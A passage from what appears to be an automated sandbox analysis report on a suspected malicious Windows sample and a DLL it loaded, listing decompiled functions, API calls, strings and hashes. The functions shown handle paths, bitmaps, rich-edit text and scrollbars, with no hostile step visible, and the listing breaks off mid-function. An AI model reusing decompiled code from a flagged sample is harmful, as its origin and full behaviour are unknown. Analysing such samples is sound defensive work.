                                      0x10007ed8
                                      0x10007edb
                                      0x10007edb
                                      0x10007e90
                                      0x10007e90
                                      0x10007e94
                                      0x10007ea4
                                      0x10007ea9
                                      0x10007eae
                                      0x10007eb6
                                      0x10007eb6
                                      0x10007eb9
                                      0x10007e6e
                                      0x10007e74
                                      0x10007e74
                                      0x10007e48
                                      0x10007e4b
                                      0x10007e4e
                                      0x10007e51
                                      0x10007fea
                                      0x10007ff3
                                      0x10007ffa
                                      0x1000801b
                                      0x10008022
                                      0x10008035
                                      0x1000803a
                                      0x1000803a
                                      0x10007ffc
                                      0x10008000
                                      0x10008056
                                      0x1000805d
                                      0x10008070
                                      0x10008075
                                      0x10008075
                                      0x10008002
                                      0x10008006
                                      0x10008080
                                      0x1000808b
                                      0x10008094
                                      0x1000809b
                                      0x100080b7
                                      0x100080b7
                                      0x100080db
                                      0x100080e2
                                      0x100080f5
                                      0x100080fa
                                      0x100080fa
                                      0x10008103
                                      0x10008103
                                      0x10008006
                                      0x10008000
                                      0x10007ffa
                                      0x10008116
                                      0x1000811c
                                      0x10008120
                                      0x00000000
                                      0x10008125
                                      0x10007e58
                                      0x10007e46

                                      APIs
                                      • SetEnhMetaFileBits.GDI32(00000000,00000000), ref: 10008015
                                      • SetWinMetaFileBits.GDI32(00000000,00000000,00000000,?), ref: 10008050
                                      • GetDC.USER32(00000000), ref: 10008085
                                      • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 100080D5
                                      • ReleaseDC.USER32 ref: 10008103
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 1000810F
                                      • HeapFree.KERNEL32(00000000), ref: 10008116
                                      Strings
                                      • Non supported attribute: %d %d %d, xrefs: 10007FD4
                                      • dibitmap should be 0 (%d), xrefs: 10007F0B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: BitsFileHeapMeta$BitmapCreateFreeProcessRelease
                                      • String ID: Non supported attribute: %d %d %d$dibitmap should be 0 (%d)
                                      • API String ID: 1262374917-1228721667
                                      • Opcode ID: 550b23a5a0f649a19c41335d2c523cad38598dcba80670626bd3508c090e2007
                                      • Instruction ID: ae2495ccf047c2fd58ccb59bc1920a8c2264feff5ba1e3b60df15eb54e99f3dd
                                      • Opcode Fuzzy Hash: 550b23a5a0f649a19c41335d2c523cad38598dcba80670626bd3508c090e2007
                                      • Instruction Fuzzy Hash: B2C12FB9E00209EBEB10CF90D885FAE77B5FB48385F108159FD086B289D775EA45CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000A7B0, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 298keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 1000A7BB
                                      • GetKeyState.USER32(00000010), ref: 1000A7CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: State
                                      • String ID: R$Style dump$t
                                      • API String ID: 1649606143-533759046
                                      • Opcode ID: f827f0813b281848d5d5bca29062919adc97ad30a9b75ffcb5b3a89824fe6d4f
                                      • Instruction ID: 5666ef65f986f6e2bf90dc35293eb8e47cce71d865684a2d2a84e307e653b016
                                      • Opcode Fuzzy Hash: f827f0813b281848d5d5bca29062919adc97ad30a9b75ffcb5b3a89824fe6d4f
                                      • Instruction Fuzzy Hash: 10B151B9A04204ABFB10CF50D841BAE37A6EB453C5F10C215F9095F2CAE775EAC0DB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10001E6D, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 130COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • Source.c, xrefs: 10001F3F
                                      • ECO_AUTOVSCROLL not implemented yet!, xrefs: 10002015
                                      • ECO_AUTOWORDSELECTION not implemented yet!, xrefs: 10002048
                                      • ECO_VERTICAL not implemented yet!, xrefs: 10001FE3
                                      • ECO_AUTOHSCROLL not implemented yet!, xrefs: 10001FFD
                                      • ECO_WANTRETURN not implemented yet!, xrefs: 10002030
                                      • !editor->selofs, xrefs: 10001F44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: __wassert
                                      • String ID: !editor->selofs$ECO_AUTOHSCROLL not implemented yet!$ECO_AUTOVSCROLL not implemented yet!$ECO_AUTOWORDSELECTION not implemented yet!$ECO_VERTICAL not implemented yet!$ECO_WANTRETURN not implemented yet!$Source.c
                                      • API String ID: 3993402318-3805334104
                                      • Opcode ID: 8236e087399bd24c6ae1879c86eaab7c61e0b581d961a5abbb5071022da15af2
                                      • Instruction ID: 25c434b80dad87d093fca20cfb5c3a14f7cc8c03316401a9fd2f7aa543138ec9
                                      • Opcode Fuzzy Hash: 8236e087399bd24c6ae1879c86eaab7c61e0b581d961a5abbb5071022da15af2
                                      • Instruction Fuzzy Hash: 845104B5E00608DFEB05CF44D881BDDB7B2FB88380F1481A9E8496B24AC735AA51CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405B89, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00405B89(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040548B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                      0x00405b8b
                                      0x00405b93
                                      0x00405ba7
                                      0x00405ba7
                                      0x00405bad
                                      0x00405bba
                                      0x00405bba
                                      0x00405bbb
                                      0x00405bbd
                                      0x00405bc1
                                      0x00405bc3
                                      0x00405bcc
                                      0x00405bce
                                      0x00405be8
                                      0x00405bf0
                                      0x00405bf0
                                      0x00405bf5
                                      0x00405bf7
                                      0x00405bf9
                                      0x00405bfd
                                      0x00405bfe
                                      0x00405c01
                                      0x00405c09
                                      0x00405c0b
                                      0x00405c0f
                                      0x00000000
                                      0x00000000
                                      0x00405c15
                                      0x00405c1a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405c1a
                                      0x00405c1f

                                      APIs
                                      • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                      • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                      • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 589700163-1604923246
                                      • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                      • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                                      • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                      • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403D44, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                      0x00403d56
                                      0x00403dea
                                      0x00000000
                                      0x00403dea
                                      0x00403d67
                                      0x00403d6b
                                      0x00000000
                                      0x00000000
                                      0x00403d71
                                      0x00403d7a
                                      0x00403d7d
                                      0x00403d7d
                                      0x00403d83
                                      0x00403d89
                                      0x00403d89
                                      0x00403d95
                                      0x00403d9b
                                      0x00403da2
                                      0x00403da5
                                      0x00403da8
                                      0x00403daa
                                      0x00403daa
                                      0x00403db2
                                      0x00403db8
                                      0x00403db8
                                      0x00403dc2
                                      0x00403dc7
                                      0x00403dca
                                      0x00403dcf
                                      0x00403dd2
                                      0x00403dd2
                                      0x00403de2
                                      0x00403de2
                                      0x00000000

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                      • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                                      • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                      • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10002195, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 285COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: EM_SETTEXTEX - %s, flags %d, cp %d${\rtf${\urtf
                                      • API String ID: 909875538-1967282443
                                      • Opcode ID: d118ce7dd801465789d66151c1ae044977d7f57222a29d1fbe0e0d9024bb3714
                                      • Instruction ID: 6e217fc72af0b8cd334a20cb4685ead0b29b5aa6f5aec4171388954daf843b2c
                                      • Opcode Fuzzy Hash: d118ce7dd801465789d66151c1ae044977d7f57222a29d1fbe0e0d9024bb3714
                                      • Instruction Fuzzy Hash: BFC13BB9D00218ABEB24CF94DC85BDEB7B5EF48384F048198F90D6B245D735AA85CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100072F0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 180COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 16%
                                      			E100072F0(intOrPtr _a4, intOrPtr* _a8, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v160;
				signed int _v164;
				char _v168;
				intOrPtr* _t91;
				signed int _t95;
				intOrPtr _t112;
				signed int _t115;
				char* _t116;
				intOrPtr _t124;
				void* _t160;
				void* _t165;

				_v32 = 0;
				_t91 = _a8;
				_v44 =  *_t91;
				_t4 = _t91 + 4; // 0x75000c7d
				_v40 =  *_t4;
				_t6 = _t91 + 8; // 0x84d8b0c
				_v36 =  *_t6;
				if( *((intOrPtr*)(_a4 + 0x4d0)) != 0) {
					do {
						_t95 = E1000C3B0(_a4,  &_v44, _a12,  &_v28,  &_v16);
						_t160 = _t160 + 0x14;
						__eflags = _t95;
						if(__eflags == 0) {
							_a12 = 0;
						} else {
							0x10000000( &_v28);
							_v52 = _t95;
							0x10000000( &_v16);
							_v48 = _t95;
							_t115 = E1000C640(__eflags, _a4,  &_v28, _v48 - _v52);
							_t165 = _t160 + 0x14;
							__eflags = _t115;
							if(_t115 == 0) {
								_v28 = _v16;
								_v24 = _v12;
								_v20 = _v8;
							}
							_t116 =  &_v44;
							0x10000000(_t116);
							_t160 = _t165 + 4;
							_a12 = _a12 - _v48 - _t116;
						}
						__eflags = _v40 - _v24;
						if(_v40 != _v24) {
							L9:
							_v168 = 0x74;
							0x10000000(_a4,  &_v44,  &_v28,  &_v168);
							_t160 = _t160 + 0x10;
							__eflags = _v164 & 0x00000020;
							if((_v164 & 0x00000020) == 0) {
								L11:
								E1000FD30( &_v168, 0, 0x74);
								_v168 = 0x74;
								_v164 = 0x20;
								_v160 = 0;
								0x10000000(_a4,  &_v44,  &_v28,  &_v168);
								_t160 = _t160 + 0x1c;
								while(1) {
									_t124 = _v12;
									__eflags = _v8 -  *((intOrPtr*)(_t124 + 0xc));
									if(_v8 <  *((intOrPtr*)(_t124 + 0xc))) {
										break;
									}
									_t112 = _v12;
									_v8 = _v8 -  *((intOrPtr*)(_t112 + 0xc));
									0x10000000(_v12);
									_t160 = _t160 + 4;
									_v12 = _t112;
								}
								_v32 = 1;
								goto L15;
							}
							__eflags = _v160 & 0x00000020;
							if((_v160 & 0x00000020) == 0) {
								goto L15;
							}
							goto L11;
						} else {
							__eflags = _v36 - _v20;
							if(_v36 == _v20) {
								L15:
								__eflags = _v24 - _v12;
								if(_v24 != _v12) {
									L17:
									_v168 = 0x74;
									0x10000000(_a4,  &_v28,  &_v16,  &_v168);
									_t160 = _t160 + 0x10;
									__eflags = _v164 & 0x00000020;
									if((_v164 & 0x00000020) == 0) {
										L19:
										E1000FD30( &_v168, 0, 0x74);
										_v168 = 0x74;
										_v164 = 0x20;
										_v160 = 0x20;
										_t78 =  &_v168; // 0x74
										0x10000000(_a4,  &_v28,  &_v16, _t78);
										_t160 = _t160 + 0x1c;
										_v32 = 1;
										goto L20;
									}
									__eflags = _v160 & 0x00000020;
									if((_v160 & 0x00000020) != 0) {
										goto L20;
									}
									goto L19;
								}
								__eflags = _v20 - _v8;
								if(_v20 == _v8) {
									goto L20;
								}
								goto L17;
							}
							goto L9;
						}
						L20:
						_v44 = _v16;
						_v40 = _v12;
						_v36 = _v8;
						__eflags = _a12;
					} while (_a12 > 0);
					return _v32;
				}
				return 0;
			}


























                                      0x100072f9
                                      0x10007300
                                      0x10007305
                                      0x10007308
                                      0x1000730b
                                      0x1000730e
                                      0x10007311
                                      0x1000731e
                                      0x10007327
                                      0x1000733b
                                      0x10007340
                                      0x10007343
                                      0x10007345
                                      0x100073ad
                                      0x10007347
                                      0x1000734b
                                      0x10007353
                                      0x1000735a
                                      0x10007362
                                      0x10007374
                                      0x10007379
                                      0x1000737c
                                      0x1000737e
                                      0x10007383
                                      0x10007389
                                      0x1000738f
                                      0x1000738f
                                      0x10007392
                                      0x10007396
                                      0x1000739b
                                      0x100073a8
                                      0x100073a8
                                      0x100073b7
                                      0x100073ba
                                      0x100073c8
                                      0x100073c8
                                      0x100073e5
                                      0x100073ea
                                      0x100073f3
                                      0x100073f6
                                      0x10007403
                                      0x1000740e
                                      0x10007416
                                      0x10007420
                                      0x1000742a
                                      0x10007447
                                      0x1000744c
                                      0x1000744f
                                      0x1000744f
                                      0x10007455
                                      0x10007458
                                      0x00000000
                                      0x00000000
                                      0x1000745a
                                      0x10007463
                                      0x1000746a
                                      0x1000746f
                                      0x10007472
                                      0x10007472
                                      0x10007477
                                      0x00000000
                                      0x10007477
                                      0x100073fe
                                      0x10007401
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x100073bc
                                      0x100073bf
                                      0x100073c2
                                      0x1000747e
                                      0x10007481
                                      0x10007484
                                      0x10007492
                                      0x10007492
                                      0x100074af
                                      0x100074b4
                                      0x100074bd
                                      0x100074c0
                                      0x100074cd
                                      0x100074d8
                                      0x100074e0
                                      0x100074ea
                                      0x100074f4
                                      0x100074fe
                                      0x10007511
                                      0x10007516
                                      0x10007519
                                      0x00000000
                                      0x10007519
                                      0x100074c8
                                      0x100074cb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x100074cb
                                      0x10007489
                                      0x1000748c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x1000748c
                                      0x00000000
                                      0x100073c2
                                      0x10007520
                                      0x10007523
                                      0x10007529
                                      0x1000752f
                                      0x10007532
                                      0x10007532
                                      0x00000000
                                      0x1000753c
                                      0x00000000

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: _memset
                                      • String ID: $ $t $t
                                      • API String ID: 2102423945-1483231515
                                      • Opcode ID: f3db133e1126fcfa0f1330f280e9068875718495b2b3a16e6fe1df792b02d39f
                                      • Instruction ID: 6be47794a57fd556550f226a9bac114a88676b330a8f33a2bd414b845d7033b0
                                      • Opcode Fuzzy Hash: f3db133e1126fcfa0f1330f280e9068875718495b2b3a16e6fe1df792b02d39f
                                      • Instruction Fuzzy Hash: 0E71FFBAD002089FDB04CF94D881BDEBBB5FF48344F148599E609AB245D774AB44CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000B110, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 157windowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 45%
                                      			E1000B110(struct HWND__** _a4) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				struct tagPOINT _v36;
				intOrPtr _v44;
				char _v48;
				struct tagSCROLLBARINFO _v108;
				intOrPtr _t74;
				void* _t133;

				_v8 = GetMessagePos();
				_v36.x = _v8 & 0x0000ffff;
				_v36.y = _v8 >> 0x00000010 & 0x0000ffff;
				if( *_a4 == 0) {
					L7:
					if(_a4[0x13a] != 2 || _a4[0x14d] == 0) {
						if(_a4[4] != 0) {
							L14:
							_t37 =  &(_a4[0x12a]); // 0x4d8b0000
							if(_v36.y <  *_t37) {
								L16:
								return 1;
							}
							_t40 =  &(_a4[0x12c]); // 0x52000005
							if(_v36.y <=  *_t40) {
								_t43 =  &(_a4[0x129]); // 0xffff6822
								if(_v36.x >=  *_t43) {
									_t102 = _a4;
									0x10000000(_a4, _v36.x, _v36.y,  &_v48,  &_v16);
									if(_v16 == 0) {
										L26:
										return 1;
									}
									_v20 = _v44;
									_t74 = E1000B0D0(_t102, _v20);
									if(_t74 == 0) {
										0x10000000(_a4);
										if(_t74 == 0) {
											goto L26;
										}
										0x10000000( &_v48);
										_v12 = _t74;
										0x10000000(_a4,  &_v24,  &_v28);
										if(_v24 > _v12 || _v28 < _v12) {
											goto L26;
										} else {
											return 1;
										}
									}
									return 1;
								}
								return 1;
							}
							goto L16;
						}
						_t31 =  &(_a4[0x12a]); // 0x4d8b0000
						if(_v36.y >=  *_t31) {
							goto L14;
						}
						_t34 =  &(_a4[0x129]); // 0xffff6822
						if(_v36.x >=  *_t34) {
							goto L14;
						}
						return 1;
					} else {
						return 1;
					}
				}
				_v108.cbSize = 0x3c;
				GetScrollBarInfo( *_a4, 0xfffffffa,  &_v108);
				if(( *(_t133 + 0xffffffffffffffbc) & 0x00018000) != 0) {
					L4:
					_v108.cbSize = 0x3c;
					GetScrollBarInfo( *_a4, 0xfffffffb,  &_v108);
					if(( *(_t133 + 0xffffffffffffffbc) & 0x00018000) != 0) {
						goto L7;
					}
					_push(_v36.y);
					if(PtInRect( &(_v108.rcScrollBar), _v36.x) == 0) {
						goto L7;
					}
					return 1;
				}
				_push(_v36.y);
				if(PtInRect( &(_v108.rcScrollBar), _v36) == 0) {
					goto L4;
				}
				return 1;
			}















                                      0x1000b11c
                                      0x1000b12a
                                      0x1000b13c
                                      0x1000b145
                                      0x1000b1e5
                                      0x1000b1ef
                                      0x1000b20e
                                      0x1000b236
                                      0x1000b23c
                                      0x1000b242
                                      0x1000b252
                                      0x00000000
                                      0x1000b252
                                      0x1000b24a
                                      0x1000b250
                                      0x1000b262
                                      0x1000b268
                                      0x1000b284
                                      0x1000b288
                                      0x1000b294
                                      0x1000b2fd
                                      0x00000000
                                      0x1000b2fd
                                      0x1000b299
                                      0x1000b2a0
                                      0x1000b2aa
                                      0x1000b2b7
                                      0x1000b2c1
                                      0x00000000
                                      0x00000000
                                      0x1000b2c7
                                      0x1000b2cf
                                      0x1000b2de
                                      0x1000b2ec
                                      0x00000000
                                      0x1000b2f6
                                      0x00000000
                                      0x1000b2f6
                                      0x1000b2ec
                                      0x00000000
                                      0x1000b2ac
                                      0x00000000
                                      0x1000b26a
                                      0x00000000
                                      0x1000b250
                                      0x1000b216
                                      0x1000b21c
                                      0x00000000
                                      0x00000000
                                      0x1000b224
                                      0x1000b22a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x1000b1fd
                                      0x00000000
                                      0x1000b1fd
                                      0x1000b1ef
                                      0x1000b14b
                                      0x1000b15e
                                      0x1000b176
                                      0x1000b198
                                      0x1000b198
                                      0x1000b1ab
                                      0x1000b1c3
                                      0x00000000
                                      0x00000000
                                      0x1000b1c8
                                      0x1000b1d9
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x1000b1db
                                      0x1000b17b
                                      0x1000b18c
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • GetMessagePos.USER32 ref: 1000B116
                                      • GetScrollBarInfo.USER32(10003B12,000000FA,0000003C), ref: 1000B15E
                                      • PtInRect.USER32(?,?,?), ref: 1000B184
                                      • GetScrollBarInfo.USER32(?,000000FB,0000003C), ref: 1000B1AB
                                      • PtInRect.USER32(?,?,?), ref: 1000B1D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: InfoRectScroll$Message
                                      • String ID: <
                                      • API String ID: 2115282619-4251816714
                                      • Opcode ID: c2d36557bdc43d638ffdbab899f66ce28fd8f04d300532c106877b32d261546b
                                      • Instruction ID: c5bb3885e0c12925b60db98093d06c38ccd21f66041d28b64b4a6c893137f00f
                                      • Opcode Fuzzy Hash: c2d36557bdc43d638ffdbab899f66ce28fd8f04d300532c106877b32d261546b
                                      • Instruction Fuzzy Hash: E25133B5A00509DFEB04CF94C891BEE77B5FF48394F608168E9159B289D735EA81CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10002B23, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 101COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 16%
                                      			E10002B23() {
				intOrPtr _t25;
				void* _t32;
				void* _t35;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t69;

				_t25 =  *((intOrPtr*)(_t54 + 8));
				0x10000000(_t25, _t54 - 0x2c4);
				0x10000000( *((intOrPtr*)(_t54 + 8)), 0);
				0x10000000( *((intOrPtr*)(_t54 + 8)), _t54 - 0x2c4, _t25);
				_t59 = _t56 + 0x1c;
				if( *((intOrPtr*)(_t54 + 0x14)) == 0) {
					0x10000000("WM_SETTEXT - NULL\n");
				} else {
					0x10000000("WM_SETTEXT lParam==%lx\n",  *((intOrPtr*)(_t54 + 0x14)));
					_t32 = E1000D770( *((intOrPtr*)(_t54 + 0x14)), "{\\rtf", 5);
					_t69 = _t59 + 0x14;
					if(_t32 == 0) {
						L3:
						E10008E50( *((intOrPtr*)(_t54 + 8)), 0,  *((intOrPtr*)(_t54 + 0x14)));
					} else {
